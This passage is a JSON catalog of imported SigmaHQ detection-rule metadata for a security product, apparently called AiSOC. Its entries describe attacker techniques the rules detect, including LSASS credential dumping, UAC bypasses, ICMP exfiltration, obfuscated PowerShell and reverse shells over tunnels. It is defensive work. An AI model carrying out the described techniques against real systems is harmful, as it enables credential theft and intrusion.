"author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/guest-users-invited-to-tenant-by-non-approved-inviters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4ad97bf5-a514-41a4-abd3-4f3455ad4865", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml" } }, { "id": "sigmahq-sigma-4ae3e30b-b03f-43aa-87e3-b622f4048eed", "type": "detection", "name": "Potential Arbitrary File Download Using Office Application", "description": "Detects potential arbitrary file download using a Microsoft Office application", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-arbitrary-file-download-using-office-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml" } }, { "id": "sigmahq-sigma-4ae68615-866f-4304-b24b-ba048dfa5ca7", "type": 
"detection", "name": "AWS ElastiCache Security Group Created", "description": "Detects when an ElastiCache security group has been created.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1136", "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-elasticache-security-group-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4ae68615-866f-4304-b24b-ba048dfa5ca7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_elasticache_security_group_created.yml" } }, { "id": "sigmahq-sigma-4ae81040-fc1c-4249-bfa3-938d260214d9", "type": "detection", "name": "Use Icacls to Hide File to Everyone", "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-icacls-to-hide-file-to-everyone.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4ae81040-fc1c-4249-bfa3-938d260214d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_icacls_deny.yml" } }, { "id": "sigmahq-sigma-4afac85c-224a-4dd7-b1af-8da40e1c60bd", "type": "detection", "name": "Account Disabled or Blocked for Sign in Attempts", "description": "Detects when an account is disabled or blocked for sign in but tried to log in", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/account-disabled-or-blocked-for-sign-in-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4afac85c-224a-4dd7-b1af-8da40e1c60bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_blocked_account_attempt.yml" } }, { "id": "sigmahq-sigma-4b046706-5789-4673-b111-66f25fe99534", "type": "detection", "name": "Deleted Data Overwritten Via Cipher.EXE", "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/deleted-data-overwritten-via-cipher-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b046706-5789-4673-b111-66f25fe99534", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml" } }, { "id": "sigmahq-sigma-4b09c71e-4269-4111-9cdd-107d8867f0cc", "type": "detection", "name": "Shell Execution via Flock - Linux", "description": "Detects the use of the \"flock\" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-execution-via-flock-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b09c71e-4269-4111-9cdd-107d8867f0cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_flock_shell_execution.yml" } }, { "id": "sigmahq-sigma-4b13db67-0c45-40f1-aba8-66a1a7198a1e", "type": "detection", "name": "Suspicious Extrac32 Alternate Data Stream Execution", "description": "Extract data from cab file and hide it in an alternate data stream", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" 
], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-extrac32-alternate-data-stream-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml" } }, { "id": "sigmahq-sigma-4b3cb710-5e83-4715-8c45-8b2b5b3e5751", "type": "detection", "name": "Modification of ld.so.preload", "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/modification-of-ld-so-preload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_ld_so_preload_mod.yml" } }, { "id": "sigmahq-sigma-4b60e6f2-bf39-47b4-b4ea-398e33cfe253", "type": "detection", "name": "CMSTP UAC Bypass via COM Object Access", "description": "Detects 
UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.002", "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/cmstp-uac-bypass-via-com-object-access.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml" } }, { "id": "sigmahq-sigma-4b657234-038e-4ad5-997c-4be42340bce4", "type": "detection", "name": "Network Connection Initiated To Visual Studio Code Tunnels Domain", "description": "Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. 
Attackers can abuse that feature to establish a reverse shell or persistence on a machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-to-visual-studio-code-tunnels-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b657234-038e-4ad5-997c-4be42340bce4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_vscode_tunnel_connection.yml" } }, { "id": "sigmahq-sigma-4b89abaa-99fe-4232-afdd-8f9aa4d20382", "type": "detection", "name": "Potentially Suspicious Malware Callback Communication", "description": "Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-malware-callback-communication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/network_connection/net_connection_win_susp_malware_callback_port.yml" } }, { "id": "sigmahq-sigma-4b8f6d3a-9c5e-4f2a-a7d8-6b9c3e5f2a8d", "type": "detection", "name": "RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class", "description": "Detects enabling or disabling of Remote Desktop Protocol (RDP) using alternate methods such as WMIC or PowerShell.\nIn PowerShell one-liner commands, the \"SetAllowTSConnections\" method of the \"Win32_TerminalServiceSetting\" class may be used to enable or disable RDP.\nIn WMIC, the \"rdtoggle\" alias or \"Win32_TerminalServiceSetting\" class may be used for the same purpose.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001", "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-enable-or-disable-via-win32-terminalservicesetting-wmi-class.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b8f6d3a-9c5e-4f2a-a7d8-6b9c3e5f2a8d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.yml" } }, { "id": "sigmahq-sigma-4b991083-3d0e-44ce-8fc4-b254025d8d4b", "type": "detection", "name": "Unusual Parent Process For Cmd.EXE", "description": "Detects suspicious parent process for cmd.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": 
"imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unusual-parent-process-for-cmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_unusual_parent.yml" } }, { "id": "sigmahq-sigma-4bb79b62-ef12-4861-981d-2aab43fab642", "type": "detection", "name": "TacticalRMM Service Installation", "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tacticalrmm-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4bb79b62-ef12-4861-981d-2aab43fab642", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml" } }, { "id": "sigmahq-sigma-4bb80281-3756-4ec8-a88e-523c5a6fda9e", "type": "detection", "name": "New Root Certificate Authority Added", "description": "Detects newly added root certificate authority to an AzureAD tenant to support certificate based authentication.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-root-certificate-authority-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4bb80281-3756-4ec8-a88e-523c5a6fda9e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_ad_new_root_ca_added.yml" } }, { "id": "sigmahq-sigma-4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c", "type": "detection", "name": "Suspicious Velociraptor Child Process", "description": "Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-velociraptor-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_velociraptor_child_process.yml" } }, { "id": "sigmahq-sigma-4be8b654-0c01-4c9d-a10c-6b28467fc651", "type": "detection", "name": "LSASS Access 
From Potentially White-Listed Processes", "description": "Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-access-from-potentially-white-listed-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_whitelisted_process_names.yml" } }, { "id": "sigmahq-sigma-4beb6ae0-f85b-41e2-8f18-8668abc8af78", "type": "detection", "name": "Sysinternals PsSuspend Suspicious Execution", "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysinternals-pssuspend-suspicious-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", "source_commit": "df5c6a6", "license": 
"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml" } }, { "id": "sigmahq-sigma-4bf943c6-5146-4273-98dd-e958fd1e3abf", "type": "detection", "name": "Invoke-Obfuscation Obfuscated IEX Invocation", "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-obfuscated-iex-invocation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" } }, { "id": "sigmahq-sigma-4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "type": "detection", "name": "Process Access via TrolleyExpress Exclusion", "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/process-access-via-trolleyexpress-exclusion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml" } }, { "id": "sigmahq-sigma-4c21b805-4dd7-469f-b47d-7383a8fcb437", "type": "detection", "name": "Potential Iviewers.DLL Sideloading", "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-iviewers-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_iviewers.yml" } }, { "id": "sigmahq-sigma-4c4af3cd-2115-479c-8193-6b8bfce9001c", "type": "detection", "name": "PowerShell ICMP Exfiltration", "description": "Detects Exfiltration Over Alternative Protocol - ICMP. 
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-icmp-exfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml" } }, { "id": "sigmahq-sigma-4c519226-f0cd-4471-bd2f-6fbb2bb68a79", "type": "detection", "name": "System Network Connections Discovery - Linux", "description": "Detects usage of system utilities to discover system network connections", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-network-connections-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml" } }, { "id": "sigmahq-sigma-4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", "type": "detection", "name": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-obfuscation-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml" } }, { "id": "sigmahq-sigma-4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", "type": "detection", "name": "Antivirus Ransomware Detection", "description": "Detects a highly relevant Antivirus alert that reports ransomware.\nThis event must not be ignored just because the AV has blocked the malware; instead, investigate how it got there in the first place.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/antivirus-ransomware-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": {
"source": "SigmaHQ/sigma", "source_id": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/category/antivirus/av_ransomware.yml" } }, { "id": "sigmahq-sigma-4c7f49ee-2638-43bb-b85b-ce676c30b260", "type": "detection", "name": "Assembly DLL Creation Via AspNetCompiler", "description": "Detects the creation of new DLL assembly files by \"aspnet_compiler.exe\", which could be a sign of \"aspnet_compiler\" abuse to proxy execution through a build provider.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/assembly-dll-creation-via-aspnetcompiler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4c7f49ee-2638-43bb-b85b-ce676c30b260", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_aspnet_temp_files.yml" } }, { "id": "sigmahq-sigma-4cad6c64-d6df-42d6-8dae-eb78defdc415", "type": "detection", "name": "Potential Linux Process Code Injection Via DD Utility", "description": "Detects the injection of code by overwriting the memory map of a Linux process using the \"dd\" Linux command.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potential-linux-process-code-injection-via-dd-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4cad6c64-d6df-42d6-8dae-eb78defdc415", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml" } }, { "id": "sigmahq-sigma-4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", "type": "detection", "name": "System Shutdown/Reboot - Linux", "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-shutdown-reboot-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_system_shutdown_reboot.yml" } }, { "id": "sigmahq-sigma-4cbd4f12-2e22-43e3-882f-bff3247ffb78", "type": "detection", "name": "PowerShell Get Clipboard", "description": "A General detection for the Get-Clipboard commands in PowerShell logs. 
This could be an adversary capturing clipboard contents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-get-clipboard.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" } }, { "id": "sigmahq-sigma-4cbef972-f347-4170-b62a-8253f6168e6d", "type": "detection", "name": "UAC Bypass Using IDiagnostic Profile", "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": 